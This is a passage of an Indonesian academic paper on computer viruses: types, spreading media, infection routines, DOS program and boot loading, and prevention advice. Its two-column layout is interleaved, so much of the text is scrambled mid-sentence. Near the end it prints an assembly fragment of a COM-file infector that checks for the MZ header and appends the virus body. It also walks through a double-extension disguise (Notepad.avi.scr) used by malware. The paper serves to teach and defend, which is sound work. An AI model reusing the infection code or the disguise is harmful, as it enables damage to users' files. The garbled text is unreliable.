terpenuhi, seperti Dedicated. tanggal/bulan tertentu, batas pemakaian tertentu, Pembuatan virus ini sendiri diilhami oleh virus MtE, frekuensi eksekusi tertentu, dan kondisi-kondisi yang muncul di awal musim semi tahun 1992. lainnya. Misalnya, Jerusalem (hanya aktif setiap hari Sementara virus MtE merupakan generasi pertama Jum’at dari virus yang menggunakan program life generator Caterpillar (aktif saat perintah COPY atau DIR MtE (Mutation Engine). dieksekusi), tanggal 13 setiap Hafenstrasse bulannya), (aktif Green setiap file 26 dieksekusi 5 kali), Shoe-B (infeksi pertama setelah copy kode-kodenya kedalam file tersebut. Virus CIH 31 kali pemanggilan dan selanjutnya akan aktif merupakan setiap 4 kali pemanggilan), Sverdlov (aktif setiap kesempatan emas ini. contoh virus mampu “melihat” saat kecuali jika angka tanggal dan bulannya sama), Swap (aktif setelah 10 menit dari waktu infeksi), 2.4.5. Tonya (menginfeksi file yang memiliki ukuran antara 50 sampai 64303 byte). Media Penyebaran Virus Komputer Seperti telah diketahui sebelumnya bahwa virus komputer tidak dapat menyebarkan dirinya Virus jenis ini sengaja tidak langsung sendiri tanpa bantuan suatu media. Media melakukan “tugas”nya supaya user tidak langsung penyebaran ini sangat membantu sekali dalam curiga tentang keberadaannya sehingga “waktu penyebaran virus karena sebenarnya media ini hidup”nya menjadi lebih panjang. Dampak yang digunakan sebagai media komunikasi data dan lambat terhadap file yang terinfeksi bisa membuat informasi. Dalam hal ini, media penyebaran virus user sedikit kebingungan mengenai apa yang dibagi menjadi dua bagian, yaitu media fisik dan sebenarnya telah terjadi. internet. D. Cavity (Spacefiller) Virus 2.4.5.1. Media Fisik Virus ini akan replikasi dirinya sendiri ke Media fisik yang sering digunakan orang dalam empty space (ruang kosong) file. Beberapa adalah disket, CD-R/RW, harddisk, flash disk, dan file, untuk suatu alasan tertentu, baik sengaja atau media penyimpanan lainnya. Walaupun sekarang tidak, mempunyai suatu ruang kosong. Nah, ruang disket sudah mulai ditinggalkan orang, tetapi kosong inilah yang dimanfaatkan oleh virus untuk penyebaran virus melalui disket masih cukup efektif tempat replikasi kode-kodenya. Hal ini merupakan dan efisien. Sebagai contoh adalah penyebaran keuntungan bagi cavity (spacefiller) virus karena virus Pesin yang mampu menyebar melalui disket kode virus yang telah masuk ini tidak akan antar warnet dan rental. Pada masa sekarang ini, menambah panjang file tersebut. Misalnya adalah CD-R/RW dan flash disk merupakan media fisik virus Lehigh. yang Virus jenis ini merupakan virus yang sangat susah dibuat karena pembuat virus memiliki “sumbangan terbesar” bagi penyebaran virus. Mengapa demikian? Karena harus kedua media ini memiliki ukuran yang kecil tapi mengetahui secara pasti besar ruang kosong kapasitas simpan datanya sangat besar. Selain tersebut sehingga virus yang akan dibuat nanti efektif dan efisien, kedua media ini juga fleksibel harus memiliki besar maksimum sebesar ruang untuk dibawa kemana saja. Sebelumnya, jika kosong file target. Tapi, setelah muncul suatu format seseorang ingin memindahkan data yang berukuran file windows baru yang dikenal dengan PE (Portable besar, misalnya 100MB, maka ia harus membawa Executable), maka peluang virus jenis ini menjadi harddisk (kapasitas 1 disket adalah 1,44MB). besar. Sebenarnya format file ini dibuat untuk Pernah suatu ketika, bulan Desember 1991, mempercepat loading and running program. Tapi suatu CD ensiklopedi dari perusahaan terkenal, hal ini mempunyai efek negatif, yaitu membuat terinfeksi virus NoInt, padahal sudah 3800 kopi CD “jurang pemisah” (ruang kosong) yang cukup besar tersebut habis terjual. Beberapa software-software dalam file tersebut sehingga virus bisa saja meng- bajakan dalam bentuk CD yang beredar, bisa berisi 27 virus, misalnya CD software Dr. Hacker dan Mrs. Virus ini dapat langsung menginfeksi walaupun Crack, Power Utilities volume 2, dan juga beberapa hanya mengunjungi suatu situs tertentu. CD games. IV. PEMBAHASAN 3.1. Komponen 2.4.5.2. Media Internet Akhir-akhir ini virus yang menyebar dengan Dasar Pembentuk Virus Komputer media internet sudah semakin banyak. Perubahan tingkah laku orang dalam bertukar informasi dan Setiap virus mempunyai beberapa rutin berinteraksi, telah menciptakan virus jenis baru. tertentu untuk menjamin kelangsungan hidupnya. Dahulu, orang masih menggunakan disket untuk Secara bertukar informasi dan berinteraksi secara fisik komponen dasar pembentuk virus, yaitu rutin melalui pertemuan langsung (tatap muka). Tapi pencari, pengganda dan anti deteksi. Setiap rutin sekarang, bertukar informasi dan berinteraksi dapat tersebut mempunyai tugas dan fungsi masing- lebih mudah dan cepat melalui internet. Internet masing yang saling mendukung satu dengan sudah menjadi media interaksi dan pertukaran lainnya. umum, ada tiga rutin yang menjadi informasi yang sangat penting. Karena internet memiliki jaringan yang sangat luas, maka para 3.1.1. Rutin Pencari pembuat virus mulai menjadikan internet sebagai Rutin pencari merupakan ujung tombak dari media penyebaran virus yang dianggap efektif dan kesuksesan infeksi virus. Sebuah virus memerlukan efisien. Virus ini biasanya menyebar lewat e- daftar nama-nama file yang ada dalam suatu mailataupun direktori pada saat fileyang mengandung games, freeware, men-download virus. dan suatu Program-program shareware untuk mengenali file yang menjadi targetnya. Sebagai contoh adalah virus macro yang memiliki akan menginfeksi semua file berekstensi .DOC dan kemungkinan terbesar sebagai sumber dari infeksi .XLS. Rutin pencari dalam struktur virus mempunyai virus. tugas untuk mengumpulkan semua informasi yang Kebanyakan virus yang menyebar adalah diperlukan agar virus dapat membuat daftar data melalui email attachment. Karena sebagian besar semua file dan kemudian memilahnya dengan pengguna jasa internet pasti menggunakan email mencari file yang bisa diinfeksinya. untuk berkomunikasi, maka attachment-attachment ini dibuat semenarik mungkin, sepeti attachment 3.1.2. Rutin Pengganda dengan ekstensi .COM, .EXE, .BAT, .LNK, .VBS, Sesuai dengan namanya, rutin pengganda .PIF, .SCR, bahkan seringkali memiliki ekstensi merupakan suatu rutin yang memiliki tugas untuk ganda. Ada beberapa situs di internet yang memang menggandakan diri dengan meng-copy kode objek menjadi media penyebaran virus, antara lain situs dalam file/program target. Penggandaan diri sendiri porno, hacker, dan situs-situs lain yang tidak jelas merupakan sifat utama dari sebuah virus komputer. pengelolanya. Dengan adanya virus yang dibuat Ada beberapa cara umum yang dilakukan oleh virus dalam bahasa pemrograman JavaScript, maka dalam menggandakan dirinya, antara lain : kemungkinan infeksi virus menjadi sangat besar. 1. File/program yang akan diinfeksi, akan dihapus atau diganti namanya dan 28 kemudian diciptakan file (yang berisi virus) dan bekerja dengan mencari seluruh file yang dengan menggunakan nama tersebut. berekstensi COM (kecuali COMMAND.COM) pada 2. Program virus yang sudah di-load ke direktori aktif berikut subdirektorinya. Kemudian memori akan langsung menginfeksi file-file menempelkan dirinya pada bagian akhir dari file lain dengan cara menumpangi seluruh korban. Virus ini aktif pada setiap hari Jum’at ketiga file/program yang ada. belas dengan serangan yang menghapus file-file dalam harddisk. 3.1.3. Rutin Anti Deteksi Ada juga virus yang menggunakan alternatif Setelah kita mencapai tujuannya, yaitu lainnya, misalnya dengan mendeteksi hentakan mampu mencari file induk yang akan diinfeksi keyboard. Bila keyboard tidak ditekan selama dengan rutin pencari dan kemudian menginfeksinya sekian menit, misalnya 10 menit, maka virus mulai dengan bantuan rutin pengganda, virus masih perlu diaktifkan. Trik ini termasuk cukup cerdik untuk rutin anti deteksi yang sangat berperan dalam memastikan bahwa user benar-benar tidak sedang menghindari deteksi, baik dari pengetahuan user berada di depan komputernya sehingga aktivitas maupun dari pantauan program antivirus yang virus yang menunggangi operasi komputer tersebut memang merupakan predatornya. Rutin anti deteksi dapat berjalan lancar tanpa sepengatahuan user. ini bisa dibangun menyatu dengan rutin pencari atau Rutin pencari, pengganda dan anti deteksi rutin pengganda sehingga menjadi satu kesatuan merupakan komponen mendasar yang ada dalam yang terintegrasi. Tetapi bisa juga merupakan setiap bagian tersendiri. mempunyai rutin-rutin tambahan yang lain di virus. Tentu saja virus-virus komputer Rutin anti deteksi ini sebenarnya adalah samping ketiga rutin tersebut. Tujuan pemberian rutin yang diperlukan untuk mengimbangi kerja rutin rutin tambahan ini adalah untuk menghentikan pencari. Maksudnya adalah bila rutin pencari operasi normal komputer, menyebabkan kerusakan, bekerja terus-menerus memeriksa setiap file yang atau hanya sekedar hiburan yang menyenangkan ada dalam disk, maka akan memakan waktu yang bagi si pembuat virus tersebut, tetapi bagi orang lain cukup lama dan menyebabkan aktivitas disk yang bisa membuat jantung berdebar hebat. tidak normal. Ini tentu cukup mengkhawatirkan Rutin-rutin tambahan tersebut akan karena seorang user yang cukup waspada dengan mempengaruhi karakter sebuah virus dan juga aktivitas virus dapat menjadi curiga sehingga berperan penting dalam mencapai tujuan virus, yaitu keberadaan virus dapat diketahui. Hal ini tentu kelangsungan hidup dan bereproduksi. Bila saja sangat tidak diinginkan oleh para pembuat virus hanya sedikit aktivitas disk, maka tidak ada orang karena menjadi yang akan memperhatikan dan keberadaan virus terhambat. Oleh karena itu, kerja rutin pencari ini akan aman-aman saja karena tidak akan diketahui. haruslah dibatasi untuk menghindari deteksi. Ini lain halnya dengan virus-virus yang banyak kelangsungan hidup virus Sebagai alternatifnya, untuk mendukung menarik perhatian banyak orang dengan rutin anti deteksi, virus diaktifkan pada kondisi- menampilkan kotak dialog “SALAM” atau langsung kondisi tertentu. Misalnya pada tanggal-tanggal menimbulkan kerusakan pada disk saat itu juga tertentu, seperti virus dari keluarga Friday 13th. sehingga orang awam pun akan bisa langsung Virus ini merupakan virus parasit yang berbahaya menebak keberadaan virus di komputernya dan 29 virus tersebut akan langsung dibasminya. Virus 3.2.3. yang mengadakan mementingkan Sebenarnya rutin manipulasi tak terlalu kelangsungan hidupnya, lebih berperan sebagai penting. Tetapi inilah yang sering mengganggu. perangkat “delivery system” saja. Pembuatnya tidak Biasanya rutin ini dibuat untuk : peduli apakah virus tersebut akan musnah di dalam a. Membuat tampilan atau pesan yang menggangu aksinya ketika virus telah mencapai sasarannya. pada layar monitor Virus jenis ini mirip dengan pilot Kamikaze yang b. Mengganti volume label disket mengorbankan c. Merusak struktur disk, menghapus file-file hidupnya tidak untuk manipulasi seperti ini tidak akan dapat lolos dari “seleksi alam”. Virus-virus Kemampuan untuk menyelesaikan sebuah misi. Dalam masalah ini, virus komputer d. Mengacaukan kerja alat-alat I/O, seperti keyboard dapat menjadi sebuah perangkat militer yang cukup dan printer efektif untuk menyelesaikan sebuah misi. 3.2.4. 3.2. Kemampuan Dasar Virus Komputer Definisi umum virus komputer Kemampuan untuk mendapatkan informasi adalah Yakni kemampuan untuk mendapatkan sebuah program komputer yang biasanya berukuran informasi tentang struktur media penyimpanan kecil yang dapat menyebabkan gangguan atau seperti letak boot record asli, letak tabel partisi, letak kerusakan pada sistem komputer dan memiliki FAT, posisi suatu file, dan sebagainya. beberapa kemampuan dasar, diantaranya adalah 3.2.5. sebagai berikut : Kemampuan untuk memeriksa keberadaan dirinya 3.2.1. Kemampuan untuk memperbanyak diri Sebelum menyusupi suatu file,virus Yakni kemampuan untuk membuat duplikat memeriksa keberadaan dirinya dalam fileitu dengan dirinya pada file-fileatau disk-disk yang belum mencari ID (tanda pengenal) dirinya di dalam fileitu. ditularinya, Fileyang belum tertular suatu virus tentunya tidak sehingga lama-kelamaan wilayah penyebarannya semakin luas. mengandung ID dari virus yang bersangkutan. Kemampuan 3.2.2. Kemampuan untuk menyembunyikan diri ini mencegah penyusupan yang berkali-kali pada suatu fileyang sama. Yakni kemampuan untuk menyembunyikan dirinya dari perhatian user, antara lain dengan cara- 3.3. Cara Kerja Eksekusi Program cara berikut : a. Menghadang keluaran ke layar selama virus b. Bagaimana sebuah file yang tersimpan di disk di-load ke memori dan dijalankan sebagai bekerja, sehingga pekerjaan virus tak tampak program ? Beginilah cara kerjanya : oleh user. Program virus ditempatkan diluar trackyang dibuat DOS (misalkan track 41) c. Ukuran virus dibuat sekecil mungkin sehingga tidak menarik kecurigaan. Sebuah file program di disk memiliki kode yang diperlukan oleh CPU untuk melakukan tugas berguna. Mungkin pula ada bagian dari file program, berupa data untuk program tersebut dan bukan merupakan instruksi prosesor. Atau mungkin pula ada bagian dari file program yang 30 bukan merupakan instruksi atau data, tapi menginterpretasikan hanyalah tempat di area tersebut yang akan COMMAND.COM segera meloncat ke proses digunakan untuk menaruh data pada saat yang mengendalikan ini. program tersebut dijalankan. File program ini, Semua perintah eksternal DOS terdapat di disk hanyalah citra magnetik dari program yang dan di-load ke memori, diproses, lalu dibuang disimpan dalam sebuah disk. Setelah file dari memori. File perintah pendek ini ditandai tersebut di-load ke memori, dan sistem operasi dengan mengalihkan CPU untuk memulai memproses command (perintah). File ini harus bisa masuk instruksi dalam program tersebut, file program ke satu segmen memori (64K) dan merupakan tersebut menjadi apa yang disebut proses. citra biner dari memori sistem. DOS me-load file Semua proses DOS memiliki sebuah titik masuk COM ke memori dan mengalihkan kontrol ke dan paling tidak satu titik keluar yang akan byte pertama dari file tersebut. mengembalikan kendali atas CPU ke proses ekstensi COM, kependekan dari Program aplikasi ditandai dengan ekstensi EXE, yang memuatnya, biasanya COMMAND.COM. kependekan dari executable (dapat dijalankan). paling tidaak ada satu proses yang sedang File ini bukanlah gambaran memori langsung, berjalan, bahkan di saat komputer tampaknya panjangnya bisa berapa aja, asal lebih pendek tidak bekerja apa-apa menanti masukan. Ketika dari jumlah yang ada, dan perlu bantuan DOS monitor, program loader DOS untuk bisa jalan. File ini sedang memiliki header yang berisi informasi untuk memeriksa loader tersebut, termasuk titik masuk, stack apakah ada masukan dari keyboard. Walaupun segment, dan ukuran program. Ada juga tabel COMMAND.COM adalah interpreter perintah relokasi berisikan daftar dari bagian program yang umum dipakai atau proses tingkat atas dimana dari berarti disesuaikan agar alamat load yang terbaru COMMAND.COM adalah satu-saatunya yang dapat diketahui. Header tidak di-load dan dapat mengubah prompt tampak di COMMAND.COM-lah mengendalikan, sistem yang secara teeratur operasi, digunakan. layar tidak Banyak sistem yang mengganti COMMAND.COM dengan proses tingkat atas lainnya yang daapt didefinisikan perintah-perintah referensi sisa terhadap dari file memori dan harus memulai memproses program pada titik masuk. Fungsi load dan eksekusi merupakan bagian dalam file konfigurasi CONFIG.SYS. saatu hal dari sistem operasi. Karena pemakai hanya yanng selalu ada pada proses tingkat atas mengetikkan nama file, tanpa ekstensi, maka adalah mereka keluar ke dirinya sendiri. Jika tidak ada perbedaan di antara perintah internal tidak, sistem operasi akan berhenti. DOS, perintah eksternal DOS, dan file program DOS memanfaatkan 2 tipe file program. (EXE). Mula-mula COMMAND.COM Keduanya memiliki kode yang dapat dieksekusi; menambahkan ekstensi COM ke perintah yang perbedaannya terletak pada cara program diketik dan mencari file dengan nama itu. Jika tersebut di-load ke memori oleh sistem operasi. tidak ditemukan, ditambahkanlah ekstensi EXE Ada beberapa perintah internal DOS yang tetap pada perintah tersebut, dan mencari lagi. Lalu, berada di memori sepanjang waktu, yaitu DIR, COMMAND.COM mencari file dengan ekstensi COPY, dan ERASE. Ketika COMMAND.COM BAT. File batch bukanlah file program yang 31 berisikan instruksi untuk prosesor, tapi file yang Bila tidak ada file IO.SYS atau IBMBIO.COM di berisi disket tersebut, akan muncul pesan “Non-system instruksi lebih lanjut untuk COMMAND.COM. Dengan kata lain, file dengan disk. Replace and ekstensi yang sembarang tombol ditekan, boot sector di-load ditemukan oleh COMMAND.COM akan di-loaad kembali dan proses pencarian diulangi kembali. ke memori dan kontrol akan dialihkan ke titik Boot sector dari disket berisi daerah data yang masuk. Jika akhirnya ekstensi BAT yang mendeskripsikan tata letak disket tersebut. Sektor ditemukan, akan pertama dari disket ini dikenal dengan nama Blok COM atau maka EXE pertama COMMAND.COM memproses perintah dala file batch tersebut. press any key.”. Setelah Parameter BIOS (BPB). Sedangkan sektor pertama pada harddisk berisi program kecil yang mencari apakah boot sector DOS untuk harddisk tersebut. Sektor program adalah file EXE atau COM? DOS tidak pertama dari harddisk berisi daerah data yang melihat dari ekstensi file, tapi dari 2 byte awal dari mendeskripsikan partisi harddisk. Sektor pertama file tersebut. Pada program yang dapat dieksekusi dari harddisk ini lebih dikenal dengan sebutan (EXE), kedua byte tersebut adalah karakter ASCII Master Boot record (MBR). Kode pertama di MBR MZ (inisial dari Mark Zbikowski, salah seorang yang mencari boot sector DOS, membacanya ke memori ikut mengembangkan DOS). Terlepas dari ekstensi dan berhenti dengan menyerahkan kendali pada file, bila 2 karakter awal adalah MZ, maka file program boot record DOS. Boot record DOS ini tersebut di-load sebagai file EXE dan bila bukan, file berisi data yang sama seperti sektor pertama disket. tersebut di-load sebagai citra memori biner. Karena itu, MBR hanyalah langkah tambahan dalam Bagaimana DOS menentukan prosedur start-up yang menjadi ciri sistem sebuah harddisk. 3.4. Cara Kerja Boot Record Waktu komputer dinyalakan atau di-reset, 3.5. Kamuflase Virus melalui Ekstensi Ganda rutin Power On Self-Test (POST) yang berada di Permasalahan kamuflasebukanlah perkara Random Only Memory (ROM) berusaha me-load masa kini saja. Sejak zaman Yunani masalah setiap sektor di disket pertama di drive pertama. Bila kamuflase telah dikenal dan dimanfaatkan, yaitu tidak ada respon dari disket tersebut, rutin ROM ketika terjadi perang antara Yunani dan Troy. Meski akan mencoba me-load sektor harddisk pertama. dikepung selama 10 tahun, Troy tidak jatuh juga. Setelah isi sektor ini di-load ke memori, kendali Sehingga dialihkan ke titik ini. Sektor pertama dari disket menyusupkan tentaranya dalam sebuah kuda kayu berbeda dari sektor pertama harddisk, namun raksasa yang berongga yang dikirimkan ke Troy. keduanya mengerjakan tugas permulaan yang Sinon, sama, yaitu me-load DOS. Pada boot sector dari meyakinkan Troy untuk membawa kuda kayu disket terdapat program kecil yang me-load direktori tersebut masuk ke kota. Di malam hari, tentara yang disket tersebut dan mencari file DOS, IO.SYS atau dikamuflasekan dalam kuda kayu dikeluarkan oleh IBMBIO.COM. Setelah file tersebut ditemukan, file Sinon yang mengakhiri Trojan War. Yunani seorang mengganti mata-mata strategi Yunani, dengan berhasil tersebut dibaca ke memori dan kendali dialihkan ke Kamuflase digunakan juga pada virus untuk sana agar loading sistem operasi dapat berlanjut. mengelabui para pengguna komputer. Diantaranya 32 dari nama file yang digunakan, virus menggunakan Windows karena merupakan ekstensi yang telah nama-nama yang memanfaatkan sifat ingin tahu dikenal oleh Windows sendiri. Kenapa begitu? seorang Movie, Karena pada kebanyakan sistem operasi Windows, XXX_Teens, opsi “Hide file extensions for known file types” manusia. Screen_Saver, AvrilFans, atau Misalnya saja Your_details, AvrilSmiles. Atau bisa juga diaktifkan. Opsi ini dapat Anda akses melalui kotak menggunakan nama-nama seperti di bawah ini dialog Folder Options. Akibatnya, ekstensi .scr akan untuk attachment-nya (virus yang menyebar melalui disembunyikan. Maka nama tersebut akan terlihat e-mail) : “Humor.ZIP” yang merupakan suatu nama dengan ekstensi yang tidak berbahaya bila diklik. fun; humor; docs; info; sorry_about_yesterday; me_nude; Card; SETUP; stuff; YOU_are_FAT!; 3.5.1. HAMSTER; news_doc; images; pics File Aplikasi Berektensi PIF dan SCR File aplikasi yang merupakan hasil kompilasi suatu kompiler, semacam Borland Delphi, Nama-nama tersebut cukup mengundang Turbo Pascal, C++ Builder, Visual Basic, dan lain rasa ingin tahu manusia untuk mengklik dan sebagainya, akan mempunyai ekstensi EXE atau menjalankan sebenarnya COM. File inilah yang dinamakan dengan program Selain itu yang para user akan menggunakannya tanpa ia kamuflase juga diterapkan pada ekstensi file yang mengetahui bagaimana dan apa yang dilakukan digunakan. Virus ini mempunyai nama attachment oleh program tersebut. Terlebih lagi source code yang terdiri dari tiga bagian. Formatnya seperti di atau kode program tersebut tidak disertakan, bawah ini: sehingga dia tidak tahu proses dan perintah apa merupakan attachment file yang yang berbahaya. NamaFile + Ekastensi_1 + Ekstensi_2 yang akan dilakukan oleh program ini. Para user akan pasrah bila menggunakan program. Ini adalah program secara umum. Program tersebut bisa jadi Untuk nama file, digunakan salah satu dari merupakan program yang baik, misalnya mampu deretan nama-nama yang telah disebut di atas. memainkan file MP3 atau avi, dan bisa juga Sedangkan untuk ekstensi_1 dipilih salah satu dari program tiga pilihan di bawah ini : harddisk. Bila seorang user menjalankan file ini ia .DOC akan dihadapkan pada dua pilihan, yaitu file ini baik .MP3 atau .ZIP Probabilitasnya 50:50, suatu peluang yang cukup Dan untuk ekstensi_2 dipilih salah satu dari dua besar untuk memperoleh kebaikan dan peluang pilihan ini : yang besar pula untuk mendapatkan kerusakan dari pif akibat penggunaan file. Untuk alasan inilah seorang scr user yang kritis dia tidak akan mau menjalankan Misalnya secara random (acak) suatu virus suatu yang file file ini jahat buruk dari yang dan dapat memformat bersifat sumber-sumber destruktif. yang tidak memberikan nama untuk attachment-nya dengan dipercayainya. Atas dasar ini maka para pembuat nama “ Humor.ZIP.scr”. Ekstensi .scr (sebagai virus mengganti ekstensi file virus mereka dengan ekstensi screen saver) akan disembunyikan oleh SCR atau PIF. Catat juga bahwa dengan ekstensi 33 tersebut file virus yang mereka buat dapat secara Kita perlu kelinci percobaan dan yang ada penuh berjalan tanpa error sedikitpun layaknya pada semua komputer adalah Notepad. Copy-kan sebuah file berekstensi EXE. Selain itu pada saja file Notepad.exe yang berada di C:\Windows ke beberapa folder server tidak menghendaki adanya attachment dengan ekstensi EXE atau COM. My Documents. Sehingga Anda tidak mengutak-utik aplikasi Notepad yang digunakan oleh Windows. 3.5.2. Simulasi Ekstensi Ganda Bagian simulasi ini merupakan bagian yang 4. Mengganti Ekstensi Notepad diperuntukkan agar lebih jelas memahami masalah Beralihlah ke folder My Documents. File ekstensi ganda. Kita akan menambahkan dua buah Notepad tersebut mempunyai nama dan ekstensi ekstensi pada sebuah file aplikasi executable. “Notepad.exe”. Tekan tombol F2 dan gantilah Aplikasi tersebut adalah Notepad yang ada pada menjadi semua komputer Windows, sehingga dapat lebih konfirmasi yang tampil, tekan saja tombol Yes. “Notepad.avi.scr”. Pada kotak dialog mudah dalam mengikuti simulasi ini. Dengan simulasi ini, dapat melihat bahwa suatu file aplikasi 5. Aktifkan Opsi dapat diganti ekstensinya menjadi “.scr” dan dapat Tampilkan lagi kotak dialog Folder Options. secara penuh dijalankan tanpa error dan hambatan Beri tanda check pada opsi “Hide file extensions for sama sekali. Inilah salah satu cara kamuflase yang known file types”, sehingga ekstensi yang dikenal digunakan pada banyak virus dan trojan. Berikut ini akan disembunyikan. Tekan tombol OK untuk adalah langkah-langkah simulasi file berekstensi menutup kotak dialog Folder Options. ganda : 6. Ingin Tahu dan Terjebak 1. Panggil Windows Explorer Jalankan Windows Explorer dengan menu Sekarang Notepad terlihat dengan nama Notepad.avi dan dapat penuh dijalankan. Start | Programs | Windows Explorer. Kemudian pilih Bagaimana bila aplikasi Notepad tersebut diganti menu View | Folder Options atau Tools | Folder dengan virus ? Tentu banyak orang yang tertipu Options untuk menampilkan kotak dialog Folder untuk menjalankan file aplikasi tersebut tanpa Options. menyadari bahaya yang mengintip dibaliknya. 3.6. Sistem Virus Komputer 2. Tab View Di kotak dialog Folder Options, pilih tab File/ Program Mencari Informasi Memeriksa file/program View. Kemudian kosongkan tanda check pada opsi “Hide file extensions for known file types”, akibatnya ekstensi file pada Explorer akan terlihat dan tidak File/Program Terinfeksi Anti Deteksi Replikasi disembunyikan. Tekan tombol OK. Gambar 3.1. Bagan Cara Kerja Virus Komputer 3.6.1. 3. File Kelinci Percobaan Mencari Informasi Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu 34 directory agar dia dapat mengenali program- Ciri utama dari adalah menggandakan virus makro yang akan menginfeksi semua file menginfeksi berekstensi itu apabila telah menemukan “calon korban”nya, maka kemampuan ia akan mengenalinya dengan memeriksanya, jika mengumpulkan informasi itu diperlukan agar virus belum terinfeksi maka sang virus akan memulai dapat terus aksinya untuk menginfeksi dengan cara menuliskan memilahnya dengan mencari file-file yang bisa byte pengenal pada program/file tersebut, dan diinfeksi. Biasanya data ini tercipta saat program kemudian yang terinfeksi kemudian dieksekusi. Sang virus dengan cara meng-copy kode objek virus ke dalam akan segera melakukan pengumpulan data dan file/program “korban”nya. Ada 2 cara yang dilakukan menaruhnya di memori, sehingga apabila komputer oleh virus untuk melakukan replikasi adalah : dan menemukannya, .xls. Setelah disinilah membuat daftar/data semua virus file, (replikasi) mampu program apa saja yang akan dia infeksi, misalnya .doc diri virus file/program melakukan lainnya. replikasi dengan cara Suatu virus dirinya sendiri dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya a. Direct dibuat sebagai hidden file oleh virus . Virus langsung menginfeksi file/program yang menjadi targetnya. File/program yang akan 3.6.2. Memeriksa File/Program Suatu memeriksa virus suatu juga diinfeksi harus program bisa untuk dihapus kemudian yang akan diinfeksi, atau diciptakan diubah suatu namanya file/program menggunakan nama itu dengan menggunakan misalnya ia bertugas menulari program berekstensi virus tersebut. .DOC dan .XLS, maka dia harus memeriksa apakah file dokumen ini telah terinfeksi atau belum, karena b. Indirect jika sudah maka dia akan percuma menularinya 2 Virus menginfeksi memori. Program virus yang kali. sudah Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal menginfeksi suatu file/program. kecepatan Yang dieksekusi/load ke memori akan langsung menulari file/program lain dengan cara umum menumpangi seluruh file/program yang ada. dilakukan oleh virus adalah memberi ID (tanda pengenal) pada file/program yang telah terinfeksi 4.2.4. Antideteksi sehingga mudah untuk dikenali oleh virus tersebut. Kemampuan menyembunyikan diri ini harus Jadi sebelum menyusupi suatu file,virus memeriksa dimiliki keberadaan dirinya dalam fileitu dengan mencari ID pekerjaan, baik dari awal sampai berhasilnya di dalam fileitu. Fileyang belum terinfeksi suatu virus infeksi, dapat terlaksana. Langkah langkah yang tentunya tidak mengandung ID dari virus yang biasa dilakukan adalah : bersangkutan. Kemampuan ini mencegah oleh semua jenis virus agar semua Program asli/virus disimpan dalam bentuk kode penyusupan yang berkali-kali pada suatu fileyang mesin dan digabung dengan program lain yang sama. dianggap berguna oleh pemakai. 3.6.3. Replikasi Program virus diletakkan pada Boot Record atau track yang komputer itu sendiri. jarang diperhatikan oleh 35 Program virus dibuat sependek mungkin, dan kita mengeksekusi file yang tertular virus hasil tersebut. file yang diinfeksi tidak berubah ukurannya. - Apabila virus bersifat menumpangi file maka Virus tidak mengubah keterangan waktu suatu virus akan merusak file asli sehingga tidak file. dapat berfungsi normal, tetapi apabila virus dll. mengadakan rutin manipulasi maka virus akan diletakkan diakhir file sehingga tidak merusak Yakni kemampuan untuk menyembunyikan file. dirinya dari perhatian user, antara lain dengan caracara berikut : - a. Menghadang keluaran ke layar selama virus Biasanya virus mengadakan manipulasi dengan vektor interupsi dengan membelokkan vektor bekerja, sehingga pekerjaan virus tak tampak interupsi maka oleh user. interupsi tertentu b. Program virus ditempatkan diluar track2 yang setiap yang terjadi pemanggilan dijalankan terlebih dahulu adalah program virus tersebut. dibuat DOS (misalkan track 41). c. Ukuran virus dibuat sekecil mungkin sehingga Berikut ini adalah contoh sebagian dari isi virus tidak menarik kecurigaan. yang dibuat dalam bahasa assembly : 3.7. Virus Executable 3.7.1. Cara Kerja Umum Seperti telah executableadalah diketahui virus yang bahwa dibuat virus dengan compiler dan bahasa pemrograman. Berikut ini beberapa cara kerja virus : - File executable yang terkena virus apabila dieksekusi akan masuk ke dalam memori dan kemudian akan menginfeksi seluruh file exectuble di directory aktif, atau virus akan menginfeksi file executable lain apabila file lain tersebut dieksekusi. - Virus yang aktif akan masuk kedalam boot sector media penyimpanan, kemudian apabila komputer melakukan proses booting dengan media penyimpanan tersebut maka virus akan aktif. - Untuk virus resident instruksi manipulasi akan ;-- cek exe/sudah kena mov ax,word ptr Buf cmp ax,4D5Ah jz Usai2 cmp ax,5A4Dh jz Usai2 cmp byte ptr Buf+3,'W'6 jz Usai2 Tular: ;-- ke ujung file mov ax,4202h xor cx,cx cwd int 21h jc Usai2 or dx,dx jnz Usai2 sub ax,3 push ax ;-- tulis mov ah,40h mov cx,offset Batas-100h mov dx,offset Mulai int 21h jc Usai2 pop Lom mov ax,4200h xor cx,cx diletakkan di memori, lalu virus ini akan menunggu kesempatan untuk mengaktifkan bagian virus yang bersifat merusak. Biasanya virus jenis ini hanya akan aktif kembali apabila Setelah diperhatikan ternyata virus ini bertujuan untuk menginfeksi file COM, virus juga menyediakan tempat sebanyak 244 bytes sebagai 36 tempat dirinya berada di ujung file korban. Virus ini - Hindari penggunaan disket-disket yang tidak akan membelokkan vektor interupsi 21h dengan bisa dipercaya sumbernya. procedure yang telah diciptakan sendiri oleh virus, Usahakan untuk tidak menggunakan disket- selain itu virus ini juga melakukan proses enkripsi disket yang sudah lama sebab mungkin saja dengan operator bit XOR untuk mengacak badan mengandung virus yang terdapat pada file korban sehingga tidak sembarangan menggunakan disket dari orang mudah dilacak. Walaupun virus ini tidak berbahaya lain yang tidak terjamin kebersihan disket dari seperti virus CIH yang dapat menghapus BIOS virus. virus, dan juga jangan (Basic Input Output System) tetapi virus ini cukup merugikan karena dapat merusak file. - Melakukan Write Protect Dengan selalu mengunci Write Protect disket 3.7.2. Penanggulangannya maka, Menghindari virus memang langkah awal kemungkinan penularan virus sebab virus tidak yang harus diambil sebelum komputer benar-benar bisa menulis pada disket yang telah di-Write terserang virus, karena lebih baik mencegah dari Protect. kita dapat lebih meminimalkan pada mengobati. Berikut ini cara-cara menghindari virus yang cukup efisien : - - Membuat sub-directory untuk program- Ubah program-program atribut menjadi Read program baru. Only Hal ini bisa melokalisir beberapa virus apabila Sebenarnya cara ini kurang menjamin sebab program kita terjangkit virus. sudah ada virus yang bisa mengubah attribut Cara membuat sub-directory : MD [drive:]path file. Tetapi cara ini lebih baik dilakukan dari Cara berpindahsub-directory : CD [drive:]path pada tidak sama sekali. Parameter untuk merubah attribut file : - Scan virus setiap disket yang tidak pasti ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H] kebersihannya dari virus. [[drive:][path]filename] [/S] Apabila kita terpaksa untuk Keterangan : 